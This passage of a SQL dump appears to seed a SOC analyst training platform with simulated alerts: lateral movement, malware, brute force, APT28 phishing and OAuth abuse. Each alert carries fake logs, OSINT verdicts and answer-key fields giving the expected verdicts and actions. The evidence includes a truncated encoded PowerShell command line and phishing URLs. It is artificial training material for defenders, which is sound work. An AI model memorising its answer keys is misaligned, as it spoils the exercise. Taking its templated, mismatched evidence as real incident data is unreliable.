detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-09-14T02:45:12Z\\\",\\\"event_id\\\":\\\"12345678\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"user\\\":\\\"admin_user\\\",\\\"action\\\":\\\"establish_persistence\\\",\\\"persistence_type\\\":\\\"service_creation\\\",\\\"service_name\\\":\\\"UpdateService\\\",\\\"service_exe\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\updater.exe\\\",\\\"file_hash\\\":\\\"abc123def4567890abc123def4567890\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.885Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-09-14T02:45:12Z\\\",\\\"event_id\\\":\\\"12345678\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"user\\\":\\\"admin_user\\\",\\\"action\\\":\\\"establish_persistence\\\",\\\"persistence_type\\\":\\\"service_creation\\\",\\\"service_name\\\":\\\"UpdateService\\\",\\\"service_exe\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\updater.exe\\\",\\\"file_hash\\\":\\\"abc123def4567890abc123def4567890\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.885Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-09-14T02:45:12Z\\\",\\\"event_id\\\":\\\"12345678\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"user\\\":\\\"admin_user\\\",\\\"action\\\":\\\"establish_persistence\\\",\\\"persistence_type\\\":\\\"service_creation\\\",\\\"service_name\\\":\\\"UpdateService\\\",\\\"service_exe\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\updater.exe\\\",\\\"file_hash\\\":\\\"abc123def4567890abc123def4567890\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.885Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-09-14T02:45:12Z\\\",\\\"event_id\\\":\\\"12345678\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"user\\\":\\\"admin_user\\\",\\\"action\\\":\\\"establish_persistence\\\",\\\"persistence_type\\\":\\\"service_creation\\\",\\\"service_name\\\":\\\"UpdateService\\\",\\\"service_exe\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\updater.exe\\\",\\\"file_hash\\\":\\\"abc123def4567890abc123def4567890\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.885Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-09-14T02:45:12Z\\\",\\\"event_id\\\":\\\"12345678\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"user\\\":\\\"admin_user\\\",\\\"action\\\":\\\"establish_persistence\\\",\\\"persistence_type\\\":\\\"service_creation\\\",\\\"service_name\\\":\\\"UpdateService\\\",\\\"service_exe\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\updater.exe\\\",\\\"file_hash\\\":\\\"abc123def4567890abc123def4567890\\\",\\\"status\\\":\\\"success\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(281, 'Lateral Movement and Data Exfiltration', 'high', 'Network Traffic Analysis', 'Detected lateral movement activities with potential data exfiltration attempts. Anomalous network traffic indicates movement from compromised host to sensitive data repositories.', 'Lateral Movement', 'T1021 - Remote Services', 1, 'Closed', 169, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"event_id\":\"1002\",\"src_ip\":\"192.168.1.105\",\"dst_ip\":\"10.0.0.55\",\"attacker_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"file_accessed\":\"confidential_data.xlsx\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"event_type\":\"network_traffic\",\"action\":\"exfiltration_attempt\"}', '2025-12-31 13:45:44', '2026-02-18 07:36:03', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Compromised internal host used for lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Targeted internal server storing sensitive data.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"External Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Confirmed malicious IP associated with known threat actor.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_data.xlsx\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Integrity Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file accessed during suspicious network activity.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Hash Database\",\"verdict\":\"clean\",\"details\":\"File hash matches known clean version.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"User Activity Monitoring\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised for lateral movement.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(282, 'Malware Detected via Suspicious Process Execution', 'high', 'CrowdStrike', 'A suspicious process \'malicious.exe\' was executed on the host \'DESKTOP-1234\'. The file hash is associated with known malware.', 'Malware', 'T1059', 1, 'Closed', 185, '{\"timestamp\":\"2023-10-15T14:32:21Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"192.168.1.50\",\"username\":\"jdoe\",\"hostname\":\"DESKTOP-1234\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"process_name\":\"malicious.exe\"}', '2025-12-31 14:09:48', '2026-02-20 09:07:39', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address belonging to the organization\'s network.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash is identified as a part of a known malware family.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Process execution behavior is indicative of malware.\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The process \'malicious.exe\' is executed from an internal machine and is linked to a known malware hash. Immediate isolation and further investigation are necessary.\"}', 'Intermediate', 'EDR', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(283, 'Suspicious Network Connection from External IP Detected', 'high', 'Firewall', 'A network connection from an external IP was detected attempting to access an internal server. The connection was flagged due to a high number of failed login attempts.', 'Brute Force', 'T1110', 1, 'Closed', 93, '{\"timestamp\":\"2023-10-12T14:32:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"admin\",\"hostname\":\"internal-server-01\",\"failed_attempts\":35}', '2026-01-01 01:58:11', '2026-02-01 20:32:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address belonging to the organization\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Common administrative account\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The external IP has been involved in multiple brute force attacks, indicating malicious intent.\"}', 'Intermediate', 'SIEM', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(284, 'Malware Detected via Suspicious Process Execution', 'critical', 'CrowdStrike', 'A suspicious process execution was detected on a host, linked to known malware activity. The process attempted to connect to a known malicious Command and Control server.', 'Malware', 'T1059', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T16:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.23\",\"dst_ip\":\"198.51.100.17\",\"hostname\":\"workstation-07\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"process_name\":\"malicious.exe\"}', '2025-12-31 20:54:16', '2026-02-01 20:32:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.17\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"IP linked to Command and Control servers\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected workstation\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The process execution and connection to a known C2 server confirm malware infection.\"}', 'Advanced', 'EDR', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(285, 'Spear-Phishing Email Campaign Detected', 'high', 'Email Gateway', 'APT28 initiates their campaign by sending carefully crafted spear-phishing emails to key personnel within political organizations, aiming to harvest credentials and gain a foothold in the network.', 'Phishing', 'T1566.002', 1, 'Closed', NULL, '{\"timestamp\":\"2023-10-15T08:47:23Z\",\"source_ip\":\"185.92.220.34\",\"destination_ip\":\"10.0.2.15\",\"email_subject\":\"Urgent: Review Attached Document\",\"sender_email\":\"john.doe@fakeorg.com\",\"recipient_email\":\"alice.smith@politicalorg.org\",\"attachment_filename\":\"Urgent_Document.pdf\",\"attachment_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"malicious_link\":\"http://malicious-link.com/login\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36\"}', '2025-12-31 15:17:10', '2026-02-18 07:40:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.34\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"Reported for phishing activities.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"john.doe@fakeorg.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"EmailRep\",\"verdict\":\"malicious\",\"details\":\"Known phishing sender.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Associated with phishing documents.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious-link.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLhaus\",\"verdict\":\"malicious\",\"details\":\"Hosting phishing page.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Spear-Phishing Email Campaign Detected\",\"date\":\"2026-02-01T20:32:18.890Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(286, 'Malicious Domain Infrastructure Identified', 'high', 'Firewall', 'APT28 has set up a credential harvesting operation using domains that mimic legitimate login portals. User traffic is being redirected to these domains following a successful phishing campaign. The captured credentials will allow the adversary to escalate their access within the network.', 'Credential Harvesting', 'T1566.002', 1, 'Closed', 169, '{\"timestamp\":\"2023-10-15T14:22:35Z\",\"firewall_id\":\"FW123456\",\"src_ip\":\"10.14.22.5\",\"dst_ip\":\"203.0.113.45\",\"src_port\":\"443\",\"dst_port\":\"80\",\"action\":\"allow\",\"domain\":\"login-secure-portal.com\",\"url\":\"http://login-secure-portal.com/login\",\"user\":\"jdoe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file\":\"login_page.html\"}', '2025-12-31 15:17:10', '2026-02-18 07:41:47', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known phishing activities.\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"login-secure-portal.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Domain Analysis Service\",\"verdict\":\"malicious\",\"details\":\"Domain registered recently and flagged for phishing.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://login-secure-portal.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Reputation Service\",\"verdict\":\"malicious\",\"details\":\"URL is hosting a phishing login page.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Reputation Database\",\"verdict\":\"suspicious\",\"details\":\"Hash matches known phishing page template.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(287, 'OAuth Token Abuse Technique Detected', 'high', 'EDR', 'APT28 uses OAuth token abuse to maintain access to compromised accounts, which enables them to exfiltrate sensitive data without needing user passwords.', 'Persistence', 'T1550.001', 1, 'Closed', 169, '{\"timestamp\":\"2023-10-12T08:45:32Z\",\"event_id\":\"evt12345\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.25\",\"username\":\"j.doe@company.com\",\"oauth_token\":\"ya29.GlsBv...Xw3Fw\",\"action\":\"token_use\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"file_name\":\"sensitive_data.docx\",\"user_agent\":\"Mozilla/5.0\",\"event_description\":\"OAuth token used for accessing cloud storage\"}', '2025-12-31 15:17:10', '2026-02-18 07:42:36', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_feed\",\"verdict\":\"malicious\",\"details\":\"Known APT28 IP address\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"j.doe@company.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_db\",\"verdict\":\"internal\",\"details\":\"Employee email address\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":false,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"suspicious\",\"details\":\"Suspicious file hash with potential data exfiltration\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(288, 'Disinformation Campaign Planning Uncovered', 'high', 'Threat Intelligence Platform', 'Analysts have uncovered a coordinated disinformation campaign through leaked communications from APT28 operatives. The campaign aims to discredit political figures and manipulate election outcomes using fake news distribution and social media manipulation.', 'Information Operations', 'T1027 - Obfuscated Files or Information', 1, 'Closed', 169, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"source_ip\":\"185.92.220.50\",\"destination_ip\":\"192.168.1.105\",\"malicious_filename\":\"election_strategy_2023.pdf\",\"hash_sha256\":\"8a7f5e3c1d4f8e1b6c3d8f7a3e2d4c5b6a1f7e8d5c2b3a4d8e3f7c1b6d2a7f9e\",\"username\":\"jdoe\",\"action\":\"file_download\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"description\":\"Leaked document detailing plans for disinformation campaign.\"}', '2025-12-31 15:17:10', '2026-02-23 03:12:26', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT28 operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host potentially compromised.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"8a7f5e3c1d4f8e1b6c3d8f7a3e2d4c5b6a1f7e8d5c2b3a4d8e3f7c1b6d2a7f9e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious document.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"election_strategy_2023.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Reports\",\"verdict\":\"suspicious\",\"details\":\"File used in the distribution of disinformation content.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.892Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"source_ip\\\":\\\"185.92.220.50\\\",\\\"destination_ip\\\":\\\"192.168.1.105\\\",\\\"malicious_filename\\\":\\\"election_strategy_2023.pdf\\\",\\\"hash_sha256\\\":\\\"8a7f5e3c1d4f8e1b6c3d8f7a3e2d4c5b6a1f7e8d5c2b3a4d8e3f7c1b6d2a7f9e\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_download\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"description\\\":\\\"Leaked document detailing plans for disinformation campaign.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.892Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"source_ip\\\":\\\"185.92.220.50\\\",\\\"destination_ip\\\":\\\"192.168.1.105\\\",\\\"malicious_filename\\\":\\\"election_strategy_2023.pdf\\\",\\\"hash_sha256\\\":\\\"8a7f5e3c1d4f8e1b6c3d8f7a3e2d4c5b6a1f7e8d5c2b3a4d8e3f7c1b6d2a7f9e\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_download\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"description\\\":\\\"Leaked document detailing plans for disinformation campaign.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.892Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"source_ip\\\":\\\"185.92.220.50\\\",\\\"destination_ip\\\":\\\"192.168.1.105\\\",\\\"malicious_filename\\\":\\\"election_strategy_2023.pdf\\\",\\\"hash_sha256\\\":\\\"8a7f5e3c1d4f8e1b6c3d8f7a3e2d4c5b6a1f7e8d5c2b3a4d8e3f7c1b6d2a7f9e\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_download\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"description\\\":\\\"Leaked document detailing plans for disinformation campaign.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.892Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"source_ip\\\":\\\"185.92.220.50\\\",\\\"destination_ip\\\":\\\"192.168.1.105\\\",\\\"malicious_filename\\\":\\\"election_strategy_2023.pdf\\\",\\\"hash_sha256\\\":\\\"8a7f5e3c1d4f8e1b6c3d8f7a3e2d4c5b6a1f7e8d5c2b3a4d8e3f7c1b6d2a7f9e\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_download\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"description\\\":\\\"Leaked document detailing plans for disinformation campaign.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.892Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 